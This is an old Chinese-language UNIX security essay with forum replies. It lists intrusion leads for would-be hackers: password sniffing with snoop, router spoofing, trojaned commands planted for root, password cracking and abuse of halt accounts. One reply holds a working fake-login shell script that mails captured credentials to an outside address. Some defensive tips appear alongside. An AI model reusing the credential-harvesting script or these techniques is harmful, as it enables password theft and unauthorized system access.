歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
Linux教程網 >> Linux綜合 >> Linux資訊 >> 更多Linux >> UNIX系統安全(二)

UNIX系統安全(二)

日期:2017/2/27 9:34:41   编辑:更多Linux
  當你為用戶精心設計了一系列安全措施後,用戶總會覺著有點“玄”。他憑什麼為這樣的網絡就是“安全”的呢?是根據設計方案的厚度?還是他為此所花的錢數?到底如何評價一個網絡的安全性呢?曾聽說過這樣的定義:“網絡的安全程度定義為該網絡被攻擊成功的可能性”,聽起來倒是蠻有哲理味兒的,可如何實際操作呢?計算機系統的安全程度可以用“橘皮書”的定義來評價,網絡系統是不是也可以搞出個“橘皮書”什麼的呢?    當你左一層右一層地對信息加密時,心裡也許認為層數越多就越安全。但事實是不是真的這樣呢?當你又加了一層密時,到底增加了多少的安全性呢?    “喏,你看....”,你指著自己的設計對用戶說“即使有人突破了第一道防線,我們還有第二道防線呢。即使第二道也被突破,我們仍然有第三道、第四....”。可憐的用戶望著得意洋洋的你,心裡不禁嘀咕:“干嘛搞這麼復雜....真的非這樣不可嗎?我可是只是想保證兩個星期的安全性啊。”    為了防止大灰狼進來,小豬們把門窗都橫七豎八地釘了個死死的。可是大灰狼會不會從別處進來呢?比如說....壁爐的煙囪!聰明的小豬們在壁爐裡燒起了一鍋開水....。小豬們是聰明的,我們的系統管理員們呢?    計算機系統的安全性依靠一種“訪問控制模型”來進行。有沒有可能建立一個“網絡安全模型”並對它進行形式化的證明,以便從理論上深入開展網絡安全的研究?這樣就可以擺脫目前的被動地“打補丁”的做法。    網絡入侵和網絡安全是一對矛盾,沒有Hacker高手就不會有好的安全系統。這聽起來有些悲哀,可惜是事實。為了提高我們的安全防范能力,我看是不是先培養一批Hacker出來(中國的Hacker太少了)。在此提供幾條線索供Hacker們參考:    用過Solaris的snoop命令嗎? 用它可以“聽到”同一共享網段內的其他用戶的口令(當然包括超級用戶的)。    sendmail 5.5.9版本以前有個debug命令, 是個強有力的遠程調試工具,可惜也是一個大bug。    冒充路由器可以看到所有往來的信息,RIP協議沒有身份認證的部分,雖然OSPF協議中有關於身份認證的部分,但很少有人用到。    NFS、NIS都是不太安全的。    1988年的WORM網絡病毒最厲害的地方並不是傳說中的利用 sendmail的缺陷,而是對看來毫無破綻的finger的攻擊!    很多系統管理員為了關機方便而設立了halt之類的特殊用戶, 怎樣利用這一點來攻擊呢?    侵入了一個系統之後,如何“打掃戰場”讓管理員看不出來? 如何潛伏下來以致於管理員除了重新安裝系統,別無清除的辦法呢?  ....  這些東西都不是我憑空想象的,國外的Hacker們就是這麼做的(他們還有很多更厲害的招數呢)。很多東西我也不知道該怎麼做,Hacker們自己努力吧。  1-----  :     1).用過Solaris的snoop命令嗎? 用它可以“聽到”同一共享網段內的其他用戶:  的口令(當然包括超級用戶的)。  :     3).冒充路由器可以看到所有往來的信息,RIP協議沒有身份認證的部分,雖然:  OSPF協議中有關於身份認證的部分,但很少有人用到。    這兩個是取得口令的最簡潔之法, 呵呵. -------         我也有一簡潔之法:    把下面的shell 命令用 ksh 運行    clear  stty ignbrk  echo "login:\c"  read logname  stty -echo  echo "passWord:\c"  read passwd  print "\nLogin incorrect\n"  print $logname $passwd  mail [email protected]  stty 0  stty echo  exit  -----  嗯,是一種方法,但必須你能訪問對方的機器才能偷到口令。常用的方法還有在自己能用的目錄裡放上叫"ls" "grep"之類的程序,希望root能不小心運行到她們, 一旦獲得 root 權限, 呵呵, 下面的我就不用說了. 所以 root 的PATH裡不應當有 . (當前目錄).    更徹底的方法就是根據passwd文件裡面的密文算口令的明文, 我曾經編過一個算passwd的程序, 能在 Pentium 100機器上用半個小時左右的時間算出長度<=5 && 只包含字母和數字 的口令. 因此選口令的時候要注意. 用jack14既可,攻擊得當的話6位不含大寫字母的pass也能在一月內破掉。    這一方法要求必須取得對方含有密文的passwd文件(有shadow passwd的機器上需要取得/etc/shadow), 所以要注意機器上passwd的安全性 (不要試圖取消用戶對該文件的讀權限, 所有的用戶都需要能讀該文件).  -----  解決的辦法, 可以用firewall屏蔽網段。  也可以使用SSL(secure socket layber)替代原有的socket明文數據傳輸。  -----  :      若干機器上都是用戶可以直接su halt, 然後就成為超級用戶了,  :      有的機器你可以用rlogin hostname -l halt 對方的機器就被shutdown了,:    我用su halt 然後就shutdown了. 有n個文件沒有存盤.




Copyright © Linux教程網 All Rights Reserved